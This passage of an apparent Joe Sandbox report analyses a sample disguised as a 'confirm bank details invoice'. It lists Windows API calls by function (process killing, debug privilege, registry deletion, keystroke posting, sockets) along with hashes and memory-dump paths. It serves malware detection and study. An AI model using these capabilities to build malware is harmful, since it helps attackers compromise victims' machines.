                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0048A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 004EDBC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                    • String ID:
                    • API String ID: 1268354404-0
                    • Opcode ID: a68a6e9ce74516c1d32d4c80605fff5873eda68241669d6865366aae8c19a21e
                    • Instruction ID: c4e4e391e5275b675f64de60d6e23d2b8c53a9748007ef70e98754618ba9bca4
                    • Opcode Fuzzy Hash: a68a6e9ce74516c1d32d4c80605fff5873eda68241669d6865366aae8c19a21e
                    • Instruction Fuzzy Hash: 38517F30A00209EFEB20DF69CC81FAE37B5EB58354F10052AF94697290E7B8ED50DB59
                    APIs
                      • Part of subcall function 004B6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004B5FA6,?), ref: 004B6ED8
                      • Part of subcall function 004B6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004B5FA6,?), ref: 004B6EF1
                      • Part of subcall function 004B72CB: GetFileAttributesW.KERNEL32(?,004B6019), ref: 004B72CC
                    • lstrcmpiW.KERNEL32(?,?), ref: 004B75CA
                    • _wcscmp.LIBCMT ref: 004B75E2
                    • MoveFileW.KERNEL32(?,?), ref: 004B75FB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    APIs
                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,004EDAD1,00000004,00000000,00000000), ref: 0048EAEB
                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,004EDAD1,00000004,00000000,00000000), ref: 0048EB32
                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,004EDAD1,00000004,00000000,00000000), ref: 004EDC86
                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,004EDAD1,00000004,00000000,00000000), ref: 004EDCF2
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,004AAEF1,00000B00,?,?), ref: 004AB26C
                    • HeapAlloc.KERNEL32(00000000,?,004AAEF1,00000B00,?,?), ref: 004AB273
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004AAEF1,00000B00,?,?), ref: 004AB288
                    • GetCurrentProcess.KERNEL32(?,00000000,?,004AAEF1,00000B00,?,?), ref: 004AB290
                    • DuplicateHandle.KERNEL32(00000000,?,004AAEF1,00000B00,?,?), ref: 004AB293
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,004AAEF1,00000B00,?,?), ref: 004AB2A3
                    • GetCurrentProcess.KERNEL32(004AAEF1,00000000,?,004AAEF1,00000B00,?,?), ref: 004AB2AB
                    • DuplicateHandle.KERNEL32(00000000,?,004AAEF1,00000B00,?,?), ref: 004AB2AE
                    • CreateThread.KERNEL32(00000000,00000000,004AB2D4,00000000,00000000,00000000), ref: 004AB2C8
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                    • String ID:
                    Similarity
                    • API ID:
                    • String ID: NULL Pointer assignment$Not an Object type
                    APIs
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                      • Part of subcall function 0048C6F4: _wcscpy.LIBCMT ref: 0048C717
                    • _wcstok.LIBCMT ref: 004C184E
                    • _wcscpy.LIBCMT ref: 004C18DD
                    • _memset.LIBCMT ref: 004C1910
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X$p2Rl2R
                    Similarity
                    • API ID: _memset
                    • String ID: Q\E$[$\$\$]$^
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004D9B19
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 004D9B2D
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004D9B47
                    • _wcscat.LIBCMT ref: 004D9BA2
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 004D9BB9
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004D9BE7
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    APIs
                      • Part of subcall function 004B6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004B6554
                      • Part of subcall function 004B6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004B6564
                      • Part of subcall function 004B6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 004B65F9
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004D179A
                    • GetLastError.KERNEL32 ref: 004D17AD
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004D17D9
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004D1855
                    • GetLastError.KERNEL32(00000000), ref: 004D1860
                    • CloseHandle.KERNEL32(00000000), ref: 004D1895
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 004B58B8
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    APIs
                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 004BA806
                    Similarity
                    • API ID: ArraySafeVartype
                    • String ID:
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 004B6B63
                    • LoadStringW.USER32(00000000), ref: 004B6B6A
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004B6B80
                    • LoadStringW.USER32(00000000), ref: 004B6B87
                    • _wprintf.LIBCMT ref: 004B6BAD
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004B6BCB
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 004B6BA8
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    APIs
                      • Part of subcall function 004D3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004D2BB5,?,?), ref: 004D3C1D
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004D2BF6
                    Similarity
                    • API ID: BuffCharConnectRegistryUpper
                    • String ID:
                    APIs
                    • select.WSOCK32 ref: 004C9691
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C969E
                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 004C96C8
                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 004C96E9
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C96F8
                    • htons.WSOCK32(?,?,?,00000000,?), ref: 004C97AA
                    • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0050DC00), ref: 004C9765
                      • Part of subcall function 004AD2FF: _strlen.LIBCMT ref: 004AD309
                    • _strlen.LIBCMT ref: 004C9800
                    Similarity
                    • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                    • String ID:
                    APIs
                    • __mtinitlocknum.LIBCMT ref: 0049A991
                      • Part of subcall function 00497D7C: __FF_MSGBANNER.LIBCMT ref: 00497D91
                      • Part of subcall function 00497D7C: __NMSG_WRITE.LIBCMT ref: 00497D98
                      • Part of subcall function 00497D7C: __malloc_crt.LIBCMT ref: 00497DB8
                    • __lock.LIBCMT ref: 0049A9A4
                    • __lock.LIBCMT ref: 0049A9F0
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00526DE0,00000018,004A5E7B,?,00000000,00000109), ref: 0049AA0C
                    • EnterCriticalSection.KERNEL32(8000000C,00526DE0,00000018,004A5E7B,?,00000000,00000109), ref: 0049AA29
                    • LeaveCriticalSection.KERNEL32(8000000C), ref: 0049AA39
                    Similarity
                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                    • String ID:
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 004D8EE4
                    • GetDC.USER32(00000000), ref: 004D8EEC
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D8EF7
                    • ReleaseDC.USER32(00000000,00000000), ref: 004D8F03
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 004D8F3F
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004D8F50
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,004DBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 004D8F8A
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004D8FAA
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • GetSystemMetrics.USER32(0000000F), ref: 004E016D
                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 004E038D
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 004E03AB
                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 004E03D6
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 004E03FF
                    • ShowWindow.USER32(00000003,00000000), ref: 004E0421
                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 004E0440
                    Similarity
                    • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                    • String ID:
                    • API String ID: 3356174886-0
                    • Opcode ID: 4ab762b0d3c034826cc4bdff908a3cee276702bb24d9e9739f1742dd63d8d6f8
                    • Instruction ID: fd4a6e13492830e199562ce0a3c405fdabeb3f6b801b168b313addf08c96f05d
                    • Opcode Fuzzy Hash: 4ab762b0d3c034826cc4bdff908a3cee276702bb24d9e9739f1742dd63d8d6f8
                    • Instruction Fuzzy Hash: 98A1D230600656EFDB18CF69C9857BEBBB1FF04702F048156EC64AB290D7B8AD90CB94
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2ac20eadd58e4ea3a583044649e3d2fb6b1265581c0704c6398384509a6fb662
                    • Instruction ID: 8fd17f48d32af942a20aed7579dae1fb64c4acbc41a5acd8458e34e9463d4703
                    • Opcode Fuzzy Hash: 2ac20eadd58e4ea3a583044649e3d2fb6b1265581c0704c6398384509a6fb662
                    • Instruction Fuzzy Hash: FA71BE70900109EFDB04DF99CC44ABFBB75FF85314F10854AFA15A6250C7789A52CFA9
                    APIs
                    • _memset.LIBCMT ref: 004D225A
                    • _memset.LIBCMT ref: 004D2323
                    • ShellExecuteExW.SHELL32(?), ref: 004D2368
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                      • Part of subcall function 0048C6F4: _wcscpy.LIBCMT ref: 0048C717
                    • CloseHandle.KERNEL32(00000000), ref: 004D242F
                    • FreeLibrary.KERNEL32(00000000), ref: 004D243E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 4082843840-2766056989
                    • Opcode ID: c1918f360e2194c8d34234c2685989aaca58f1dfacadce7e26750ebe016f54a0
                    • Instruction ID: b0a7e745e27dc34923cf4cbb6884f2eb8e7cd872288688a1b1916b304a8bf50f
                    • Opcode Fuzzy Hash: c1918f360e2194c8d34234c2685989aaca58f1dfacadce7e26750ebe016f54a0
                    • Instruction Fuzzy Hash: E6716C70A006199FCF04EFA5C5919AEBBF5FF48314F10846BE859AB351CB78AD41CB98
                    APIs
                    • GetParent.USER32(00000000), ref: 004B3C02
                    • GetKeyboardState.USER32(?), ref: 004B3C17
                    • SetKeyboardState.USER32(?), ref: 004B3C78
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004B3CA4
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004B3CC1
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004B3D05
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004B3D26
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    • Opcode ID: 20d136c9154be342d30fcd0fcdec1fa2e9feba26e0fa756496e6939b355c17dc
                    • Instruction ID: 0aaf34f3ad9bb197b051d3a5ed2497e541139ac0989388669898f228c2cd0a7d
                    • Opcode Fuzzy Hash: 20d136c9154be342d30fcd0fcdec1fa2e9feba26e0fa756496e6939b355c17dc
                    • Instruction Fuzzy Hash: 705136A19083D13DFB328B768C45BF7BFA95B06305F08848AE0C5565C3D298EE94D778
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 004D3DA1
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004D3DCB
                    • FreeLibrary.KERNEL32(00000000), ref: 004D3E80
                      • Part of subcall function 004D3D72: RegCloseKey.ADVAPI32(?), ref: 004D3DE8
                      • Part of subcall function 004D3D72: FreeLibrary.KERNEL32(?), ref: 004D3E3A
                      • Part of subcall function 004D3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 004D3E5D
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 004D3E25
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    • Opcode ID: a5e25093b3bbab4af714883b60fb087d1fec2d1b93373ab40a3e7884aa17ab29
                    • Instruction ID: 3078786b79f25a8d6821c7b516506cef38cc1fc198cc8c5c9e9ef3c54208334e
                    • Opcode Fuzzy Hash: a5e25093b3bbab4af714883b60fb087d1fec2d1b93373ab40a3e7884aa17ab29
                    • Instruction Fuzzy Hash: 833119B1D01109BFDB149F90DC99AFFB7BDEB08305F00016BE512A2290DA749F49DAA9
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004D8FE7
                    • GetWindowLongW.USER32(0111E148,000000F0), ref: 004D901A
                    • GetWindowLongW.USER32(0111E148,000000F0), ref: 004D904F
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 004D9081
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004D90AB
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 004D90BC
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004D90D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    • Opcode ID: 9b87661aced4a9db53b5c809df4fd87140d924fdcb777aed51032104e4cc75d4
                    • Instruction ID: 94491a98af9a977e701839a6bee041ea4db9f259538b4f53e6c346a260e6cf85
                    • Opcode Fuzzy Hash: 9b87661aced4a9db53b5c809df4fd87140d924fdcb777aed51032104e4cc75d4
                    • Instruction Fuzzy Hash: CE3137346002149FEB228F98EC95F6637A5FB5A314F14016AF519CF3B1CB75AC44DB49
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B08F2
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B0918
                    • SysAllocString.OLEAUT32(00000000), ref: 004B091B
                    • SysAllocString.OLEAUT32(?), ref: 004B0939
                    • SysFreeString.OLEAUT32(?), ref: 004B0942
                    • StringFromGUID2.OLE32(?,?,00000028), ref: 004B0967
                    • SysAllocString.OLEAUT32(?), ref: 004B0975
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                    • String ID:
                    • API String ID: 3761583154-0
                    • Opcode ID: e131d7b1607613ca233360879060e0f30a2c8182be77cf2ad607def2262c9d8d
                    • Instruction ID: d5681f63cd2a4a599b60150484e37c362367127f0d64bf42dbea4428c7aeea02
                    • Opcode Fuzzy Hash: e131d7b1607613ca233360879060e0f30a2c8182be77cf2ad607def2262c9d8d
                    • Instruction Fuzzy Hash: 1521B572A01208AFAB10EF68CC88DFF73ACEB08361B008126F915DB251D774ED45CB68
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                    • API String ID: 1038674560-2734436370
                    • Opcode ID: ce44a658889e426ff9147fdddc765fbbf439a4eaa406256143e4f87038aa8309
                    • Instruction ID: 5ce1c7a6a48c2e968f983423cc3d971ea42c569d78d46841d7db51c5bbccfeef
                    • Opcode Fuzzy Hash: ce44a658889e426ff9147fdddc765fbbf439a4eaa406256143e4f87038aa8309
                    • Instruction Fuzzy Hash: 582148321001217AC630FA259E02EEB7798EF64308F50442BF446A7182E6AD994283BD
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B09CB
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004B09F1
                    • SysAllocString.OLEAUT32(00000000), ref: 004B09F4
                    • SysAllocString.OLEAUT32 ref: 004B0A15
                    • SysFreeString.OLEAUT32 ref: 004B0A1E
                    • StringFromGUID2.OLE32(?,?,00000028), ref: 004B0A38
                    • SysAllocString.OLEAUT32(?), ref: 004B0A46
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                    • String ID:
                    • API String ID: 3761583154-0
                    • Opcode ID: cf427d46acce82bfeea5bbfbc34604ffe3158f09ed0cfc05e94e394250a935ec
                    • Instruction ID: 06237cafaf685c66671a74c756ac8e26d33378f6527ba3f81b33b2f37cd2ae0e
                    • Opcode Fuzzy Hash: cf427d46acce82bfeea5bbfbc34604ffe3158f09ed0cfc05e94e394250a935ec
                    • Instruction Fuzzy Hash: 84215E75600204AF9B10EFA8DC89DBF77ACEF1C3617008526F909CB2A1E674ED45CB68
                    APIs
                      • Part of subcall function 0048D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0048D1BA
                      • Part of subcall function 0048D17C: GetStockObject.GDI32(00000011), ref: 0048D1CE
                      • Part of subcall function 0048D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0048D1D8
                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 004DA32D
                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 004DA33A
                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004DA345
                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 004DA354
                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 004DA360
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$CreateObjectStockWindow
                    • String ID: Msctls_Progress32
                    • API String ID: 1025951953-3636473452
                    • Opcode ID: d1a2f515e1091b882926435fbd4f841fde011eac9789b00658304eb8e96d4a33
                    • Instruction ID: 68e3a2928a25e89e7177968680e10ef01520e8a5147febc9c2c7ca914be8fac9
                    • Opcode Fuzzy Hash: d1a2f515e1091b882926435fbd4f841fde011eac9789b00658304eb8e96d4a33
                    • Instruction Fuzzy Hash: 4111E6B1100219BEEF105FA1CC85EEB7F6DFF08798F014116FA04A61A0C7769C21DBA8
                    APIs
                    • GetClientRect.USER32(?,?), ref: 0048CCF6
                    • GetWindowRect.USER32(?,?), ref: 0048CD37
                    • ScreenToClient.USER32(?,?), ref: 0048CD5F
                    • GetClientRect.USER32(?,?), ref: 0048CE8C
                    • GetWindowRect.USER32(?,?), ref: 0048CEA5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Rect$Client$Window$Screen
                    • String ID:
                    • API String ID: 1296646539-0
                    • Opcode ID: cb4efdc38e4bf738d3cb1d8b869ca226f17ab54e844e5f7c6216463f80016aee
                    • Instruction ID: 6041da601ed8675f7d8993edc2e03acb4f123912201a6788b347806954c4a2f3
                    • Opcode Fuzzy Hash: cb4efdc38e4bf738d3cb1d8b869ca226f17ab54e844e5f7c6216463f80016aee
                    • Instruction Fuzzy Hash: 9EB15A79900249DBDF10DFA9C4807EEBBB1FF08300F14952AEC59EB250DB38A951CB69
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 004D1C18
                    • Process32FirstW.KERNEL32(00000000,?), ref: 004D1C26
                    • __wsplitpath.LIBCMT ref: 004D1C54
                      • Part of subcall function 00491DFC: __wsplitpath_helper.LIBCMT ref: 00491E3C
                    • _wcscat.LIBCMT ref: 004D1C69
                    • Process32NextW.KERNEL32(00000000,?), ref: 004D1CDF
                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 004D1CF1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
• Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
